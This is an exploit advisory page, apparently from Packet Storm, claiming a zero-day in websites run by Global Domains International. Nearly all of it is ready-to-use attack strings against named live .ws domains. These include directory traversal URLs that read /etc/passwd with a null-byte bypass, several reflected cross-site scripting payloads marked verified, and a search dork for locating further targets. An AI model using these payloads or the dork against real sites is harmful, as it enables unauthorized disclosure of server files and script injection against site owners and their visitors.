Sites by Global Domains International, Inc suffer from cross site scripting and directory traversal vulnerabilities. Note that this finding houses site-specific data.
0f6600539c8143a8fa9d056116a8e385d2f7f10edcf47301dbf33bf88f5ab309Global Domains International Directory traversal Vulnerability 0-Day
====================================================================
Author : indoushka
vendor : http://www.nic.ws
========================================================
# Dork : Copyright © 2014 by Global Domains International, Inc · All Rights Reserved
http://www.nic.ws//kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11
https://www.website.ws//kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11
http://www.7.ws//kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11
http://www.movie.ws//kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11
http://welcome-back.ws//kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11
Cross site scripting (verified) :
/article.dhtml?article=touring&sponsor=wsnic%22%20onmouseover%3dprompt(771818860)%20bad%3d%22
/kvmlm2/index.dhtml?fname=1%22%20onmouseover%3dprompt(771818860)%20bad%3d%22&language=spanish&lname=&sponsor=gdi&template=11
/members/?language=english'%22()%26%25<ScRiPt%20>prompt(771818860)</ScRiPt>
/orderflow/index.dhtml?sponsor=1'%22()%26%25<ScRiPt%20>prompt(771818860)</ScRiPt>
http://freedom.ws//?language=french%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%28771818860%29%3C/ScRiPt%3E
freedom.ws/show_dvd.dhtml?language=spanish'"()%26%25<ScRiPt >prompt(771818860)</ScRiPt>&sponsor=gditraffic
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed